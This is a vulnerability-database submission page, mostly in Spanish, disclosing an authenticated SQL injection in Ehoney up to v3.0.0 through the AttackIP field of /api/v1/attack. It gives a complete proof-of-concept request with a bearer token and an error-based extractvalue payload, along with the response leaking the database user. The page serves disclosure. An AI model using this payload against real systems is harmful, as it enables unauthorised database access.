Enviar #49823: Ehoney <= v3.0.0 Authenticated SQL injection via /api/v1/attack routeinformación

TítuloEhoney <= v3.0.0 Authenticated SQL injection via /api/v1/attack route
Descripciónrepo: https://github.com/seccome/Ehoney ## requests POST /api/v1/attack HTTP/1.1 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo Content-Length: 211 Content-Type: application/json Host: x.x.x.x:8080 { "Payload": "", "AttackIP": "' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #", "ProbeIP": "", "JumpIP": "", "HoneypotIP": "", "ProtocolType": "", "PageNumber": 1, "PageSize": 1 } ## response { "code": 1006, "msg": "数据库异常", "data": "Error 1105: XPATH syntax error: '[email protected]~'; Error 1105: XPATH syntax error: '[email protected]~'" } ## affected code https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/models/attack.go#L35
Usuario
 Anonymous User
Sumisión2022-10-26 03:44 (hace 4 años)
Moderación2022-10-28 07:26 (2 days later)
EstadoAceptado
Entrada de VulDB212411 [seccome Ehoney /api/v1/attack AttackIP inyección SQL]
Puntos17

AnteriorVisión De ConjuntoPróximo

Do you need the next level of professionalism?

Upgrade your account now!